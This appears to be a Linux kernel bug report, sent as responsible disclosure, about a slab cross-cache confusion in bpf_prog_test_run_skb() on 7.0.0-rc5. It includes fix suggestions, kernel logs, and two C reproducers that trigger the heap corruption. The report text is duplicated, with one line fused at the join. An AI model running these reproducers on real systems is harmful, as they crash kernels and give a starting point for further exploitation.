[BUG] bpf: warn_free_bad_obj in bpf_prog_test_run_skb - slab cross-cache confusion in skb_free_head
From: antonius
Date: Mon Mar 30 2026 - 12:18:10 EST
Hi,
I found a slab cache confusion bug in bpf_prog_test_run_skb() on Linux
7.0.0-rc5, triggered via BPF_PROG_TEST_RUN with BPF_PROG_TYPE_SCHED_CLS.
The issue was originally discovered by syzkaller during a fuzzing campaign
targeting io_uring BPF filter and BPF test_run subsystems.
== Bug Description ==
bpf_test_init() allocates skb->head using kzalloc() with size:
data_size_in + NET_SKB_PAD + NET_IP_ALIGN = 284 + 32 + 2 = 318 bytes
SLUB rounds this up to the kmalloc-1k cache (704 bytes as reported by
KFENCE). However, skb_free_head() subsequently calls:
kmem_cache_free(skbuff_small_head_cache, head)
This is the wrong cache — the object belongs to kmalloc-1k, not
skbuff_small_head. SLUB detects this mismatch and fires warn_free_bad_obj(),
followed by a KFENCE out-of-bounds read in print_track().
== Affected Code ==
net/bpf/test_run.c: bpf_test_init()
net/core/skbuff.c: skb_free_head()
The root cause is a mismatch between the allocation cache used by
bpf_test_init() and the cache assumed by skb_free_head() when determining
how to free skb->head for test skbs.
== Kernel Version ==
7.0.0-rc5 (commit: confirmed on rc5 tag)
Also tested: Lubuntu 25.10 (kernel 7.0.0-rc5, CONFIG_KFENCE=y)
Debian Trixie syzkaller VM (kernel 7.0.0-rc5, CONFIG_KFENCE=y)
== Privilege Required ==
CAP_BPF or root. BPF_PROG_TYPE_SCHED_CLS requires bpf_capable().
== Reproducer ==
Minimal C reproducer (2 syscalls):
--- 8< ---
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#ifndef __NR_bpf
#define __NR_bpf 321
#endif
static uint8_t bpf_insns[] = {
/* ld_imm64 r0, 0 */
0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
/* exit */
0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
/* 284 bytes test data (size critical: NET_SKB_PAD+NET_IP_ALIGN+284 > 512) */
static uint8_t test_data[284];
int main(void)
{
/* BPF_PROG_LOAD: SCHED_CLS, 3 insns */
uint8_t load_attr[0x94];
memset(load_attr, 0, sizeof(load_attr));
*(uint32_t*)(load_attr+0x00) = 3; /* SCHED_CLS */
*(uint32_t*)(load_attr+0x04) = 3; /* insn_cnt */
*(uint64_t*)(load_attr+0x08) = (uint64_t)bpf_insns;
*(uint64_t*)(load_attr+0x10) = (uint64_t)"GPL";
int fd = (int)syscall(__NR_bpf, 5, load_attr, 0x94);
if (fd < 0) { perror("BPF_PROG_LOAD"); return 1; }
/* BPF_PROG_TEST_RUN: data="" flags=BPF_F_TEST_RUN_ON_CPU, repeat=4 */
uint8_t run_attr[0x50];
memset(run_attr, 0, sizeof(run_attr));
*(uint32_t*)(run_attr+0x00) = (uint32_t)fd; /* prog_fd */
*(uint32_t*)(run_attr+0x08) = 284; /* data_size_in */
*(uint64_t*)(run_attr+0x10) = (uint64_t)test_data;
*(uint32_t*)(run_attr+0x20) = 4; /* repeat */
*(uint32_t*)(run_attr+0x40) = 4; /* flags=BPF_F_TEST_RUN_ON_CPU */
syscall(__NR_bpf, 10, run_attr, 0x50);
return 0;
}
--- 8< ---
Build: gcc -O0 -o repro repro.c
Run: sudo ./repro (requires CAP_BPF)
sudo dmesg | grep warn_free_bad_obj
== Kernel Output ==
[ 761.069607] ------------[ cut here ]------------
[ 761.069623] kmem_cache_free(skbuff_small_head, ffff888186dfac00): object belongs to different cache kmalloc-1k
[ 761.069638] WARNING: mm/slub.c:6258 at warn_free_bad_obj+0x91/0xc0, CPU#0: repro/1513
[ 761.069670] Modules linked in:
[ 761.069690] CPU: 0 UID: 0 PID: 1513 Comm: repro Not tainted 7.0.0-rc5 #1
[ 761.069716] RIP: 0010:warn_free_bad_obj+0x98/0xc0
[ 761.069882] Call Trace:
[ 761.069888] <TASK>
[ 761.069899] skb_free_head+0x1ec/0x290
[ 761.069918] skb_release_data+0x7a6/0x9d0
[ 761.069970] bpf_prog_test_run_skb+0x14f8/0x3410
[ 761.070190] __sys_bpf+0x769/0x4b60
[ 761.070422] do_syscall_64+0x111/0x690
[ 761.070456] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 761.070610] </TASK>
[ 761.073682] ==================================================================
[ 761.073736] BUG: KFENCE: out-of-bounds read in print_track+0x0/0x50
[ 761.073790] Out-of-bounds read at 0xffff888186dfb010 (1040B right of kfence-#252):
[ 761.074117] kfence-#252: 0xffff888186dfac00-0xffff888186dfaebf, size=704, cache=kmalloc-1k
[ 761.074168] allocated by task 1513 on cpu 0 at 761.069452s:
[ 761.074198] bpf_test_init.isra.0+0xf9/0x1e0
[ 761.074218] bpf_prog_test_run_skb+0x489/0x3410
== Security Impact ==
This bug causes heap corruption via slab cross-cache confusion. An object
from kmalloc-1k is placed into the freelist of skbuff_small_head cache.
Subsequent alloc_skb() calls can reclaim this chunk, potentially leading to:
- Information leak (stale kernel data readable via new skb->head)
- Heap corruption if controlled data written before reclaim
- Denial of service (kernel WARNING, system instability)
Full exploitation to LPE would require chaining with additional primitives
(KASLR bypass, heap spray). Bug is not directly exploitable for LPE without
further primitives.
CVSS v3.1 estimate: AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H = 6.7 (Medium)
== Fix Suggestion ==
In bpf_test_init() (net/bpf/test_run.c), the skb->head allocation should
either:
1. Use skb_head_from_pool() or kmalloc_reserve() to ensure the allocation
lands in the cache that skb_free_head() expects, or
2. Set skb->head_frag = 0 and clear the relevant flags so skb_free_head()
takes the kfree() path instead of kmem_cache_free() path.
Alternatively, skb_free_head() should verify the slab cache before calling
kmem_cache_free().
Reported-by: Antonius <antonius@xxxxxxxxxxxxxxxxx>
Thanks,
Antonius
Blue Dragon Security
https://bluedragonsec.com
#define _GNU_SOURCEI found a slab cache confusion bug in bpf_prog_test_run_skb() on Linux
7.0.0-rc5, triggered via BPF_PROG_TEST_RUN with BPF_PROG_TYPE_SCHED_CLS.
The issue was originally discovered by syzkaller during a fuzzing campaign
targeting io_uring BPF filter and BPF test_run subsystems.
== Bug Description ==
bpf_test_init() allocates skb->head using kzalloc() with size:
data_size_in + NET_SKB_PAD + NET_IP_ALIGN = 284 + 32 + 2 = 318 bytes
SLUB rounds this up to the kmalloc-1k cache (704 bytes as reported by
KFENCE). However, skb_free_head() subsequently calls:
kmem_cache_free(skbuff_small_head_cache, head)
This is the wrong cache — the object belongs to kmalloc-1k, not
skbuff_small_head. SLUB detects this mismatch and fires warn_free_bad_obj(),
followed by a KFENCE out-of-bounds read in print_track().
== Affected Code ==
net/bpf/test_run.c: bpf_test_init()
net/core/skbuff.c: skb_free_head()
The root cause is a mismatch between the allocation cache used by
bpf_test_init() and the cache assumed by skb_free_head() when determining
how to free skb->head for test skbs.
== Kernel Version ==
7.0.0-rc5 (commit: confirmed on rc5 tag)
Also tested: Lubuntu 25.10 (kernel 7.0.0-rc5, CONFIG_KFENCE=y)
Debian Trixie syzkaller VM (kernel 7.0.0-rc5, CONFIG_KFENCE=y)
== Privilege Required ==
CAP_BPF or root. BPF_PROG_TYPE_SCHED_CLS requires bpf_capable().
== Reproducer ==
Minimal C reproducer (2 syscalls):
--- 8< ---
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#ifndef __NR_bpf
#define __NR_bpf 321
#endif
static uint8_t bpf_insns[] = {
/* ld_imm64 r0, 0 */
0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
/* exit */
0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
/* 284 bytes test data (size critical: NET_SKB_PAD+NET_IP_ALIGN+284 > 512) */
static uint8_t test_data[284];
int main(void)
{
/* BPF_PROG_LOAD: SCHED_CLS, 3 insns */
uint8_t load_attr[0x94];
memset(load_attr, 0, sizeof(load_attr));
*(uint32_t*)(load_attr+0x00) = 3; /* SCHED_CLS */
*(uint32_t*)(load_attr+0x04) = 3; /* insn_cnt */
*(uint64_t*)(load_attr+0x08) = (uint64_t)bpf_insns;
*(uint64_t*)(load_attr+0x10) = (uint64_t)"GPL";
int fd = (int)syscall(__NR_bpf, 5, load_attr, 0x94);
if (fd < 0) { perror("BPF_PROG_LOAD"); return 1; }
/* BPF_PROG_TEST_RUN: data="" flags=BPF_F_TEST_RUN_ON_CPU, repeat=4 */
uint8_t run_attr[0x50];
memset(run_attr, 0, sizeof(run_attr));
*(uint32_t*)(run_attr+0x00) = (uint32_t)fd; /* prog_fd */
*(uint32_t*)(run_attr+0x08) = 284; /* data_size_in */
*(uint64_t*)(run_attr+0x10) = (uint64_t)test_data;
*(uint32_t*)(run_attr+0x20) = 4; /* repeat */
*(uint32_t*)(run_attr+0x40) = 4; /* flags=BPF_F_TEST_RUN_ON_CPU */
syscall(__NR_bpf, 10, run_attr, 0x50);
return 0;
}
--- 8< ---
Build: gcc -O0 -o repro repro.c
Run: sudo ./repro (requires CAP_BPF)
sudo dmesg | grep warn_free_bad_obj
== Kernel Output ==
[ 761.069607] ------------[ cut here ]------------
[ 761.069623] kmem_cache_free(skbuff_small_head, ffff888186dfac00): object belongs to different cache kmalloc-1k
[ 761.069638] WARNING: mm/slub.c:6258 at warn_free_bad_obj+0x91/0xc0, CPU#0: repro/1513
[ 761.069670] Modules linked in:
[ 761.069690] CPU: 0 UID: 0 PID: 1513 Comm: repro Not tainted 7.0.0-rc5 #1
[ 761.069716] RIP: 0010:warn_free_bad_obj+0x98/0xc0
[ 761.069882] Call Trace:
[ 761.069888] <TASK>
[ 761.069899] skb_free_head+0x1ec/0x290
[ 761.069918] skb_release_data+0x7a6/0x9d0
[ 761.069970] bpf_prog_test_run_skb+0x14f8/0x3410
[ 761.070190] __sys_bpf+0x769/0x4b60
[ 761.070422] do_syscall_64+0x111/0x690
[ 761.070456] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 761.070610] </TASK>
[ 761.073682] ==================================================================
[ 761.073736] BUG: KFENCE: out-of-bounds read in print_track+0x0/0x50
[ 761.073790] Out-of-bounds read at 0xffff888186dfb010 (1040B right of kfence-#252):
[ 761.074117] kfence-#252: 0xffff888186dfac00-0xffff888186dfaebf, size=704, cache=kmalloc-1k
[ 761.074168] allocated by task 1513 on cpu 0 at 761.069452s:
[ 761.074198] bpf_test_init.isra.0+0xf9/0x1e0
[ 761.074218] bpf_prog_test_run_skb+0x489/0x3410
== Security Impact ==
This bug causes heap corruption via slab cross-cache confusion. An object
from kmalloc-1k is placed into the freelist of skbuff_small_head cache.
Subsequent alloc_skb() calls can reclaim this chunk, potentially leading to:
- Information leak (stale kernel data readable via new skb->head)
- Heap corruption if controlled data written before reclaim
- Denial of service (kernel WARNING, system instability)
Full exploitation to LPE would require chaining with additional primitives
(KASLR bypass, heap spray). Bug is not directly exploitable for LPE without
further primitives.
CVSS v3.1 estimate: AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H = 6.7 (Medium)
== Fix Suggestion ==
In bpf_test_init() (net/bpf/test_run.c), the skb->head allocation should
either:
1. Use skb_head_from_pool() or kmalloc_reserve() to ensure the allocation
lands in the cache that skb_free_head() expects, or
2. Set skb->head_frag = 0 and clear the relevant flags so skb_free_head()
takes the kfree() path instead of kmem_cache_free() path.
Alternatively, skb_free_head() should verify the slab cache before calling
kmem_cache_free().
Reported-by: Antonius <antonius@xxxxxxxxxxxxxxxxx>
Thanks,
Antonius
Blue Dragon Security
https://bluedragonsec.com
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#ifndef __NR_bpf
#define __NR_bpf 321
#endif
/* BPF insns: ld_imm64(r0,0) + exit — 3 insns = 24 bytes */
static uint8_t bpf_prog_bytes[] = {
0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
/* Data 284 bytes persis dari syzkaller repro.cprog — confirmed crash */
static uint8_t syz_data[284] = {
0x60,0xdc,0x24,0x19,0xdd,0x5e,0x95,0xd4,0x73,0x79,0xd5,0x04,0xef,0x23,0xc1,0x79,
0x45,0x52,0xaa,0x7b,0x7d,0x1d,0x56,0xfa,0xba,0x28,0x2e,0x46,0xc9,0x45,0x81,0x3d,
0x60,0x90,0xa3,0x11,0x47,0xc0,0x7f,0x95,0xf2,0x71,0x69,0xcb,0x54,0xbe,0x67,0x59,
0x79,0x28,0x85,0xcb,0x60,0xfa,0x32,0x80,0x61,0xa0,0xc9,0x05,0xc3,0xaa,0x1e,0x4c,
0x7b,0x82,0xf5,0x74,0x69,0x25,0x10,0x83,0xa0,0x12,0x8e,0x50,0xde,0xb0,0x10,0x72,
0xd9,0xc4,0x7a,0x94,0xca,0x02,0xb3,0xf7,0x4a,0xf9,0xba,0xcf,0xb5,0xf7,0x06,0x13,
0x36,0x1b,0x48,0x01,0xbe,0xd2,0x6b,0x41,0x30,0xf9,0x68,0x1e,0xd2,0xa7,0xc6,0x93,
0xff,0x8e,0xd1,0xea,0xf8,0x20,0xc0,0x60,0x13,0x33,0xe5,0xed,0x3f,0xd2,0xdc,0x8a,
0x5d,0xea,0xbe,0xeb,0x37,0xaf,0x12,0x0a,0x72,0xe5,0x00,0x8f,0xea,0xf8,0xae,0x0f,
0x59,0x9d,0xc1,0x86,0xc5,0xd5,0x8c,0x54,0x4a,0x1e,0xc8,0x83,0xf4,0xbc,0x04,0x6e,
0xd9,0x7a,0xf6,0x39,0x06,0xc0,0x12,0xab,0x0b,0xa6,0xa6,0x6e,0x06,0xcc,0x06,0x17,
0x78,0xe5,0x95,0x13,0x1c,0x15,0xcd,0xdf,0x7c,0x57,0x75,0xe3,0xaa,0x3d,0x8a,0x14,
0x13,0x97,0xed,0x95,0x93,0x90,0x27,0x81,0xf2,0xa1,0x64,0x32,0x5f,0x30,0x4c,0xba,
0x56,0x6f,0xa5,0x7e,0xef,0xff,0xa7,0x9e,0xa5,0xbb,0x08,0x71,0xd9,0x9f,0x3e,0xbb,
0x4c,0x46,0xed,0x51,0xc9,0x55,0x2b,0xda,0x25,0xa8,0x12,0x85,0xdc,0x0b,0x06,0x4a,
0xa7,0xfc,0xfb,0x00,0xf7,0x8a,0x33,0x24,0x8e,0x4d,0xf8,0x87,0xf2,0xe6,0x09,0x5c,
0x05,0xc9,0x97,0x20,0x96,0x66,0xf9,0xb5,0xad,0x2f,0xed,0x68,0x41,0xfa,0xb9,0x93,
0x28,0x88,0x5b,0x45,0x5e,0x61,0x6f,0x62,0x94,0xaa,0x17,0x68,
};
static int bpf_load(void)
{
uint8_t attr[0x94];
memset(attr, 0, sizeof(attr));
*(uint32_t*)(attr+0x00) = 3; /* SCHED_CLS */
*(uint32_t*)(attr+0x04) = 3; /* insn_cnt */
*(uint64_t*)(attr+0x08) = (uint64_t)bpf_prog_bytes;
*(uint64_t*)(attr+0x10) = (uint64_t)"GPL";
return (int)syscall(__NR_bpf, 5, attr, 0x94);
}
static long bpf_run(int fd, void *data, uint32_t sz,
uint32_t repeat, uint32_t flags)
{
uint8_t attr[0x50];
memset(attr, 0, sizeof(attr));
*(uint32_t*)(attr+0x00) = (uint32_t)fd;
*(uint32_t*)(attr+0x08) = sz;
*(uint64_t*)(attr+0x10) = (uint64_t)data;
*(uint32_t*)(attr+0x20) = repeat;
*(uint32_t*)(attr+0x40) = flags; /* BPF_F_TEST_RUN_ON_CPU = 4 */
*(uint32_t*)(attr+0x44) = 0; /* cpu = 0 */
return syscall(__NR_bpf, 10, attr, 0x50);
}
int main(void)
{
printf("repro2 — warn_free_bad_obj (syzkaller exact data)\n");
printf("uid=%d euid=%d\n", getuid(), geteuid());
/* Setup mmap persis seperti syzkaller */
syscall(__NR_mmap, 0x1ffffffff000ul, 0x1000ul,
0ul, 0x32ul, -1, 0ul);
syscall(__NR_mmap, 0x200000000000ul, 0x1000000ul,
7ul, 0x32ul, -1, 0ul);
syscall(__NR_mmap, 0x200001000000ul, 0x1000ul,
0ul, 0x32ul, -1, 0ul);
int fd = bpf_load();
if (fd < 0) {
printf("[-] BPF_PROG_LOAD: %s\n", strerror(errno));
return 1;
}
printf("[+] prog fd=%d\n", fd);
printf("[*] Trigger: syz_data=284B flags=4 repeat=4\n");
long ret = bpf_run(fd, syz_data, 284, 4, 4);
printf("[*] ret=%ld\n", ret);
/* Loop untuk reliability */
for (int i = 0; i < 50; i++)
bpf_run(fd, syz_data, 284, 4, 4);
printf("[+] Done — cek: dmesg | grep warn_free\n");
close(fd);
return 0;
}
Attachment:
dmesg.png
Description: PNG image
